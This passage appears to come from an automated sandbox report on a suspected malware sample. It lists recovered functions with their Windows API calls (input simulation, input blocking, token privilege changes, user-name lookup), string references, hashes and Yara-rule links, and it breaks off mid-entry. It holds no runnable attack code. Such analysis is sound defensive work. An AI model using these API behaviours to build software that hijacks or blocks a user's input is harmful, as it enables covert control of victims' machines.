Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 71c26a2eb7c9619d8a067a321df6f37ea257658018f1b75c851d73a06d7a0816
Instruction ID: 8b6315ae938c0dec700251bfa539c8adc369d0546680c83f911b1d91df24ae01
Opcode Fuzzy Hash: 71c26a2eb7c9619d8a067a321df6f37ea257658018f1b75c851d73a06d7a0816
Instruction Fuzzy Hash: C2E0B671010248BBCF11BF64ED0DA583B6AEB45785B208058FD099A173CB35DDA2CA80

Function 0021C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 0021C36C

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 7757c26dd8dedab0441df7beca3cf94d6dad586abf646411d3925acf68952cfe
Instruction ID: b3b174ea77ef3291e816ad06333578448d73d1b84368fcdf64a6da01fa7545ec
Opcode Fuzzy Hash: 7757c26dd8dedab0441df7beca3cf94d6dad586abf646411d3925acf68952cfe
Instruction Fuzzy Hash: 7941367A950219AFCB24AFB9DC48EFB77B8EB94314F2042A9F915C7180E6709DD1CB50

Function 0023D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 0023D28C

Strings

X64, xrefs: 0023D2A8

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: 98e1c2f0fd2ba1abd1232ca1981094747416c9bafc6d18866b63d04b5c6f7bd6
Instruction ID: ded7fa040df7b71f90ab100ca101d5fb9d53cf5348cce6269361e506b12e5993
Opcode Fuzzy Hash: 98e1c2f0fd2ba1abd1232ca1981094747416c9bafc6d18866b63d04b5c6f7bd6
Instruction Fuzzy Hash: 1FD0C9B481111DEADF94CBA0EC88DEAB37CBB04305F100155F506A2000DB7095488F10

Function 0020CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction ID: 53c0826c62041fe1241f46f99fb7e3d624f6f0c1f357656dc1653909ced9dd21
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: CC022EB1E1021A9FDF14CFA9C8806ADFBF5FF48324F25426AD819E7385D730A9518B84

Function 001ECAF0 Relevance: 3.2, Strings: 2, Instructions: 659COMMON

Download Yara Rule

Strings

p#+, xrefs: 001ECF7F
Variable is not of type 'Object'., xrefs: 00230C40

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.$p#+
API String ID: 0-4251930221
Opcode ID: 15b380c2592c3c2ed9d7439e4965b66190b4c38ffa261e1501e4805f1262a0ab
Instruction ID: a8cf847a7df903bfdff47f8bc3e2313b1988d84e8a173d86115066f596c30962
Opcode Fuzzy Hash: 15b380c2592c3c2ed9d7439e4965b66190b4c38ffa261e1501e4805f1262a0ab
Instruction Fuzzy Hash: 0232BD70910659DFCF18DF95CC90AEDB7B5FF14304F248059E806AB292DB75AE46CBA0

Function 002568EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00256918
FindClose.KERNEL32(00000000), ref: 00256961

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 45adb710c4bdeafadc9175657efa0ae4eb1237ef2c3b4fdb9d8f1a3addbc9e3b
Instruction ID: d9512208cec76d9294ee6febe6f91476032f0dcf20f95e7cf89f3a912e07dbb5
Opcode Fuzzy Hash: 45adb710c4bdeafadc9175657efa0ae4eb1237ef2c3b4fdb9d8f1a3addbc9e3b
Instruction Fuzzy Hash: 9011D3316146419FC710CF29D888A1ABBE0FF84329F54C69DE8698F2A2CB30EC45CB91

Function 002537B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00264891,?,?,00000035,?), ref: 002537E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00264891,?,?,00000035,?), ref: 002537F4

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 63fae263219c9774c957cd258340a48fd537af178a6da0513d4ac69ba0fd6fcf
Instruction ID: 24dc457e0d990aebfef5c36ed0848dcdc18a1226210534378b6187108f8f1cb5
Opcode Fuzzy Hash: 63fae263219c9774c957cd258340a48fd537af178a6da0513d4ac69ba0fd6fcf
Instruction Fuzzy Hash: B1F0EC706143253AE72057765C4DFDB769DDFC4761F100165F909D3281D9705944C7B0

Function 0024B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0024B25D
keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 0024B270

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: f5a48fb19f96073b88f854416b1d757d19890c12481bfeee0ee48bb00d8cc80a
Instruction ID: c4c2f8eaf7d7675ee4a9024c014bf9fad646d3a770a5495596d9b44f11869c91
Opcode Fuzzy Hash: f5a48fb19f96073b88f854416b1d757d19890c12481bfeee0ee48bb00d8cc80a
Instruction Fuzzy Hash: ABF01D7181424EABDB05DFA0D805BAE7BB4FF04305F108009F955A5191D7B9C651DF94

Function 002410BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002411FC), ref: 002410D4
CloseHandle.KERNEL32(?,?,002411FC), ref: 002410E9

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: e743a1f39b141e377774afff8757fcd7354324f0836935ef4e9a1f6adda0cfbb
Instruction ID: d1e4af27a79f8c7c3e4058147912bdfa9cd1338328b856b179a0bae55d0affa6
Opcode Fuzzy Hash: e743a1f39b141e377774afff8757fcd7354324f0836935ef4e9a1f6adda0cfbb
Instruction Fuzzy Hash: 7EE0BF72018611AEF7252B61FC09E7777A9EF04310B24882DF5A5804B1DBA26CE1DB50

Function 0021676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00216766,?,?,00000008,?,?,0021FEFE,00000000), ref: 00216998

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: c0b24aef1377c3d1b8a86972f90c344ed137c8cf9cea0f3f970501c8a61421f2
Instruction ID: 3c7a9d8d68baabccc0f8aefb65fae520d41a6be5986b66187207e21ee07c63d1
Opcode Fuzzy Hash: c0b24aef1377c3d1b8a86972f90c344ed137c8cf9cea0f3f970501c8a61421f2
Instruction Fuzzy Hash: E1B14D31520609DFD715CF28C48ABA97BE0FF55364F29C658E899CF2A2C335D9A5CB40

Function 001FB119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 0023851F

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: c068e9f9115d249b132a151236c4cfb81729fc111e41a066ce2485b5b136c44c
Instruction ID: 8dcf82cba86a91b3797f9149fd72e7ecc3952e4bb788fcd7a4ddc137a7da3870
Opcode Fuzzy Hash: c068e9f9115d249b132a151236c4cfb81729fc111e41a066ce2485b5b136c44c
Instruction Fuzzy Hash: A8126EB19142299BCB14CF58C980AFEB7F5FF48710F15819AE949EB251EB309E91CF90

Function 0025EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 0025EABD

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 1cd6599b57a1d550b152436f5da6ad9f241255298e3a271589a9936a2d5127e9
Instruction ID: 5493318d3a9175c4f9ada4f2b4878803fe4085c90bb3dfc39c7a82675ca66d30
Opcode Fuzzy Hash: 1cd6599b57a1d550b152436f5da6ad9f241255298e3a271589a9936a2d5127e9
Instruction Fuzzy Hash: BBE04F712102049FC710EF6AE844E9AF7EDBFA8760F01841AFD4AC7351DBB0E9458B90

Function 002009D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,002003EE), ref: 002009DA

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 715f3b5f37bc3f4ccf5a13b7e7ad7771aef90a7afb6e95db4f4bbf72a7f7eaf0
Instruction ID: 99300aa6af827ded96e027db54cf70dedf7058fbe2c4f54318db634035b66c73
Opcode Fuzzy Hash: 715f3b5f37bc3f4ccf5a13b7e7ad7771aef90a7afb6e95db4f4bbf72a7f7eaf0
Instruction Fuzzy Hash:

Function 0020781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 0020798B

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: d6e5f819e4226f9935835e5d1f30cc6303ca8209ff75bab75419f6ca69dff900
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: 9C516961E3C74B5BDB388D68885D7BF23999B42300F188519D882C72C3C661FE75E762

Function 00252046 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

0&+, xrefs: 00252053

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID:
String ID: 0&+
API String ID: 0-3024635622
Opcode ID: 1d48b072b458ad574b97c86e23ddbc0fcbf2b86c89dba73831e1feb6a4e9155e
Instruction ID: 9a118a857a3a06c625b2a1a03070931a747465829c9fa9c3a8c4dea0054568bd
Opcode Fuzzy Hash: 1d48b072b458ad574b97c86e23ddbc0fcbf2b86c89dba73831e1feb6a4e9155e
Instruction Fuzzy Hash: 7F21A832621611CBDB28CE79C81267E73E5A764310F15862EE4A7C77D1DE35A908CB44

Function 00216DD9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b39734f14c6be3df49c479b44304252f253ad4d7a35e88d25aff2c926238e9d
Instruction ID: c6f794bc2789d975103d27a899bdda00a5ade5b8de5c4fa36db2cdcdf49fc927
Opcode Fuzzy Hash: 2b39734f14c6be3df49c479b44304252f253ad4d7a35e88d25aff2c926238e9d
Instruction Fuzzy Hash: C8322335D3AF018DD7239634D826336A699AFB73C5F15C737E81AB59A6EB29C4C34200

Function 001FCC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f300da451992b99542907e3bbe60d0da4079c277394a72bfa33f3d3cc1dadcb
Instruction ID: c356d53be874be87ef73e2a45e8ab6bc1840d0a2be1453ed7b69cb0af17e4285
Opcode Fuzzy Hash: 9f300da451992b99542907e3bbe60d0da4079c277394a72bfa33f3d3cc1dadcb
Instruction Fuzzy Hash: D5326BB2A2415E8BCF28CF28C59467DB7A1EF45314F38852BD949EB291D730DDA1EB40

Function 001E7920 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b612cce46df1aaea2bd157539114bc8bd3c8f74d6666fd83afd4b51671644619
Instruction ID: 351c7fe965e2621618184b66c6647f43f9911bddaaccf1c2d7dc8479d22e521e
Opcode Fuzzy Hash: b612cce46df1aaea2bd157539114bc8bd3c8f74d6666fd83afd4b51671644619
Instruction Fuzzy Hash: 9522E570A14A1AEFEF14CFA5D881AAEB3F5FF54300F148129E816E7291EB359D61CB50

Function 001E91C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ec48340e326629bec242ce74d6ae0042f40b6098cc4e748c998ca188cbe52c8
Instruction ID: f9876962872e08a81edd2b0ee25c4a1598a5e356921b6e1a09ebc2b2f35ba5da
Opcode Fuzzy Hash: 9ec48340e326629bec242ce74d6ae0042f40b6098cc4e748c998ca188cbe52c8
Instruction Fuzzy Hash: 8C02F8B0E1051AFBDF04DF94D881AADB7B5FF54300F118169E916DB291EB719E21DB80

Function 00201C77 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: b66eaa727699389156d62b819686353a3c456d4c5c7302774cedee61055a057a
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 4D918A725282A34ADB2D4A3E857403EFFE15A923A131A079ED4F2CB1C7FE14D974D620

Function 002019B0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: ee811f259eaf41ebd842b19b6f88db270bfbaa26585fb568b1dd3568f0cbe551
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 779165722292E34EDB2D4A7A857403EFFE15A923A531A079ED4F2CB1C2FE14D574D620

Function 00207A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
